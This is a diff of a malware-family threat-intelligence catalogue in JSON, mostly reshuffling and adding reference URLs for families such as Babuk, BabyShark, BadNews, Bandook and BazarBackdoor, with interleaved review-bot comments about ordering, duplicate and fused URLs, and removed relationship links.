- "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html"
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-moving-to-vm-nix-systems.pdf",
+ "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
+ "https://www.fr.sogeti.com/globalassets/france/avis-dexperts--livres-blancs/cybersecchronicles_-_babuk.pdf",
+ "https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/",
+ "https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/"
],
"synonyms": [
"Babyk",
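Review bot: the only substantive change to the Babuk `refs` list is the added `https://blog.morphisec.com/babuk-ransomware-variant-major-attack`, yet almost every existing URL is removed and re-added in a different position. That ordering looks non-deterministic; generate the list with a stable sort (or preserve the previous order) before export so future diffs stay reviewable and an accidental drop among forty reshuffled lines cannot hide.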
@@ -13365,11 +14236,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
"https://www.mandiant.com/resources/evolution-of-fin7",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.infosecurityeurope.com/__novadocuments/367989?v=636338290033030000",
- "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
+ "https://www.infosecurityeurope.com/__novadocuments/367989?v=636338290033030000"
],
"synonyms": [],
"type": []
@@ -13384,35 +14255,43 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark",
"https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
"https://twitter.com/i/web/status/1099147896950185985",
- "https://www.youtube.com/watch?v=Dv2_DK3tRgI",
+ "https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1",
+ "https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/",
+ "https://www.youtube.com/watch?v=rfzmHjZX70s",
+ "https://blog.alyac.co.kr/3352",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
+ "https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
+ "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
+ "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
+ "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
"https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
"https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf",
- "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
- "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
- "https://www.youtube.com/watch?v=rfzmHjZX70s",
- "https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1",
- "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
- "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
- "https://blog.alyac.co.kr/3352",
- "https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf"
+ "https://blog.google/threat-analysis-group/how-were-protecting-users-from-government-backed-attacks-from-north-korea/",
+ "https://www.youtube.com/watch?v=Dv2_DK3tRgI"
+ ],
+ "synonyms": [
+ "LATEOP"
+ ],
+ "type": []
+ },
+ "uuid": "8abdd40c-d79a-4353-80e3-29f8a4229a37",
+ "value": "BabyShark"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bachosens",
+ "https://medium.com/threat-intel/cybercrime-investigation-insights-bachosens-e1d6312f6b3a"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "78ed653d-2d76-4a99-849e-1509e4573c32",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
- "uuid": "8abdd40c-d79a-4353-80e3-29f8a4229a37",
- "value": "BabyShark"
+ "uuid": "c5b3d358-62f8-46fe-85dc-44b565052f94",
+ "value": "Bachosens"
},
{
"description": "FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.",
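Review bot: the fused URL `https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html` is a broken reference (two addresses concatenated into one); it was already present and is re-added unchanged rather than fixed, while both of its parts also appear as separate entries in the same list, so drop the fused one. This hunk additionally removes the BabyShark `related` link (dest-uuid `78ed653d-2d76-4a99-849e-1509e4573c32`) and introduces `Bachosens` with an empty `description`, both of which deserve a line in the commit message.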
@@ -13432,8 +14311,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.backconfig",
- "https://unit42.paloaltonetworks.com/threat-assessment-hangover-threat-group/",
- "https://unit42.paloaltonetworks.com/atoms/thirstygemini/"
+ "https://unit42.paloaltonetworks.com/atoms/thirstygemini/",
+ "https://unit42.paloaltonetworks.com/threat-assessment-hangover-threat-group/"
],
"synonyms": [],
"type": []
@@ -13472,10 +14351,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
"https://www.secureworks.com/research/threat-profiles/bronze-geneva",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/",
- "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf"
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/"
],
"synonyms": [
"Lecna",
@@ -13483,15 +14362,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "cd6c5f27-cf7e-4529-ae9c-ab5b85102bde",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "23398248-a52a-4a7c-af10-262822d33a4e",
"value": "backspace"
},
@@ -13500,16 +14370,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap",
+ "https://research.checkpoint.com/the-evolution-of-backswap/",
"https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/",
- "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi",
- "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/",
- "https://www.cyberbit.com/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/",
- "https://explore.group-ib.com/htct/hi-tech_crime_2018",
- "https://www.cert.pl/en/news/single/backswap-malware-analysis/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/",
"https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
- "https://research.checkpoint.com/the-evolution-of-backswap/"
+ "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/",
+ "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi",
+ "https://explore.group-ib.com/htct/hi-tech_crime_2018",
+ "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.cert.pl/en/news/single/backswap-malware-analysis/",
+ "https://www.cyberbit.com/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/"
],
"synonyms": [],
"type": []
@@ -13522,8 +14392,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
"https://www.us-cert.gov/ncas/analysis-reports/ar19-252a",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf"
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack"
],
"synonyms": [],
"type": []
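Review bot: `https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html` is, by its title, a general AV-evasion tutorial rather than a report on BADCALL, and the same URL is also added to the BadNews entry further down in this patch; if it is only cited because it happens to reuse a sample, consider whether it meets the bar for a family-level reference. Separately, the new WeLiveSecurity URL lacks the trailing slash that the other WeLiveSecurity entries in this file carry, which matters if refs are ever deduplicated by exact string match.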
@@ -13563,9 +14435,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch",
+ "https://team-cymru.com/blog/2021/03/15/fin8-badhatch-threat-indicator-enrichment/",
"https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://team-cymru.com/blog/2021/03/15/fin8-badhatch-threat-indicator-enrichment/"
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf"
],
"synonyms": [],
"type": []
@@ -13578,32 +14450,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
"https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/",
- "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/",
- "https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait",
"https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
- "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign",
+ "https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait",
+ "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf",
"https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf",
"http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2",
- "https://lab52.io/blog/new-patchwork-campaign-against-pakistan/",
- "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf",
+ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/",
"https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf"
+ "https://lab52.io/blog/new-patchwork-campaign-against-pakistan/",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
+ "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "48ca79ff-ea36-4a47-8231-0f7f0db0e09e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1",
"value": "BadNews"
},
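Review bot: the `related` array pointing at dest-uuid `48ca79ff-ea36-4a47-8231-0f7f0db0e09e` is removed, so the BadNews cluster loses its `similar` relationship; if this is part of a galaxy-wide cleanup of stored relationships, state that in the commit message so downstream users know the links moved rather than vanished. The added cocomelonc URL is the same generic AV-evasion tutorial cited elsewhere in this patch, so its relevance to BadNews specifically should be checked as well.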
@@ -13625,9 +14489,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut",
- "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf",
"https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/",
- "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/"
+ "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/",
+ "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf"
],
"synonyms": [],
"type": []
@@ -13640,9 +14504,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.baldr",
+ "https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf",
"https://www.youtube.com/watch?v=E2V4kB_gtcQ",
- "https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/",
"https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/"
],
"synonyms": [
@@ -13684,8 +14548,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital",
- "https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/",
- "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/trojan-bamital-13-en.pdf"
+ "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/trojan-bamital-13-en.pdf",
+ "https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/"
],
"synonyms": [],
"type": []
@@ -13711,8 +14575,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bancos",
- "https://www.fireeye.com/blog/threat-research/2009/03/bancos-a-brazilian-crook.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/banking-trojan-latam-brazil"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/banking-trojan-latam-brazil",
+ "https://www.fireeye.com/blog/threat-research/2009/03/bancos-a-brazilian-crook.html"
],
"synonyms": [],
"type": []
@@ -13721,18 +14585,19 @@
"value": "bancos"
},
{
- "description": "",
+ "description": "Bandook malware is a remote access trojan (RAT) first seen in 2007 and has been active for several years. Written in both Delphi and C++, it was first seen as a commercial RAT developed by a Lebanese creator named PrinceAli. Over the years, several variants of Bandook were leaked online, and the malware became available for public download.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook",
- "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf",
- "https://research.checkpoint.com/2020/bandook-signed-delivered",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook",
"https://www.welivesecurity.com/2021/07/07/bandidos-at-large-spying-campaign-latin-america/",
- "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot",
"https://research.checkpoint.com/2020/bandook-signed-delivered/",
+ "https://research.checkpoint.com/2020/bandook-signed-delivered",
+ "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot",
+ "https://www.eff.org/deeplinks/2023/02/uncle-sow-dark-caracal-latin-america",
+ "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf",
"https://twitter.com/malwrhunterteam/status/796425285197561856",
- "https://www.eff.org/files/2018/01/29/operation-manul.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook"
+ "https://www.eff.org/files/2018/01/29/operation-manul.pdf"
],
"synonyms": [
"Bandok"
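Review bot: `https://research.checkpoint.com/2020/bandook-signed-delivered` (no trailing slash) is removed and then re-added, leaving it alongside `https://research.checkpoint.com/2020/bandook-signed-delivered/`; these resolve to the same article, so keep one. The new description is a welcome improvement over the empty string, but "first seen in 2007 and has been active for several years" reads awkwardly; "first seen in 2007 and active for many years since" would be clearer.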
@@ -13752,15 +14617,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "fa9b2176-1248-4d59-8da2-c31c7501a81d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7",
"value": "bangat"
},
@@ -13769,10 +14625,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori",
- "http://blog.kleissner.org/?p=69",
+ "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/",
"http://blog.kleissner.org/?p=192",
- "http://osint.bambenekconsulting.com/feeds/",
- "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/"
+ "http://blog.kleissner.org/?p=69",
+ "http://osint.bambenekconsulting.com/feeds/"
],
"synonyms": [
"BackPatcher",
@@ -13789,30 +14645,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot",
+ "https://malverse.it/analisi-bankshot-copperhedge",
+ "https://blog.reversinglabs.com/blog/hidden-cobra",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-133a",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a",
"https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-108a",
"https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a",
- "https://blog.reversinglabs.com/blog/hidden-cobra",
- "https://www.secureworks.com/research/threat-profiles/nickel-gladstone",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-133a"
+ "https://www.secureworks.com/research/threat-profiles/nickel-gladstone"
],
"synonyms": [
"COPPERHEDGE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "d9431c02-5391-11e8-931f-4beceb8bd697",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886",
"value": "Bankshot"
},
@@ -13860,9 +14709,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bart",
- "https://intel471.com/blog/a-brief-history-of-ta505",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf"
],
"synonyms": [],
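Review bot: `https://intel471.com/blog/a-brief-history-of-ta505` and `https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/` appear to be the same post served from two hostnames; this hunk only moves the former, so it is a good moment to collapse them to one canonical URL rather than carrying both.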
@@ -13876,8 +14725,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper",
- "https://www.rewterz.com/rewterz-news/rewterz-threat-alert-common-raven-iocs",
- "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html"
+ "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html",
+ "https://www.rewterz.com/rewterz-news/rewterz-threat-alert-common-raven-iocs"
],
"synonyms": [],
"type": []
@@ -13898,133 +14747,160 @@
"uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e",
"value": "Batel"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bat_loader",
+ "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle",
+ "https://medium.com/walmartglobaltech/revisiting-batloader-c2-structure-52f46ff9893a",
+ "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif",
+ "https://www.trendmicro.com/en_us/research/23/a/batloader-malware-abuses-legitimate-tools-uses-obfuscated-javasc.html",
+ "https://www.mandiant.com/resources/seo-poisoning-batloader-atera",
+ "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery",
+ "https://intel471.com/blog/malvertising-surges-to-distribute-malware",
+ "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
+ "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ce6fe6c6-a74a-4cf7-adf8-41b5433bcbb6",
+ "value": "BATLOADER"
+ },
{
"description": "BazarBackdoor is a small backdoor, probably by a TrickBot \"spin-off\" like anchor. Its called team9 backdoor (and the corresponding loader: team9 restart loader).\r\n\r\nFor now, it exclusively uses Emercoin domains (.bazar), thus the naming. FireEye uses KEGTAP as name for BazarLoader and BEERBOT for BazarBackdoor.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
- "https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/",
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
- "https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9",
- "https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/",
- "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
- "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
- "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
- "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
- "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
- "https://abnormalsecurity.com/blog/bazarloader-contact-form",
- "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
- "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue",
- "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
- "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
- "https://www.scythe.io/library/threatthursday-ryuk",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I",
- "https://unit42.paloaltonetworks.com/api-hammering-malware-families/",
- "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
- "https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
- "https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
- "https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
- "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
- "https://www.0ffset.net/reverse-engineering/bazarloader-iso-file-infection/",
- "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
"https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://johannesbader.ch/blog/yet-another-bazarloader-dga/",
- "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
- "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/",
- "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
- "https://pcsxcetrasupport3.wordpress.com/2021/11/16/excel-4-macro-code-obfuscation/",
- "https://www.0ffset.net/reverse-engineering/analysing-the-main-bazarloader/",
- "https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/",
- "https://elis531989.medium.com/highway-to-conti-analysis-of-bazarloader-26368765689d",
- "https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/",
- "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://fr3d.hk/blog/campo-loader-simple-but-effective",
- "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
- "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II",
- "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
- "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
- "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/",
- "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
"https://isc.sans.edu/diary/27308",
- "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
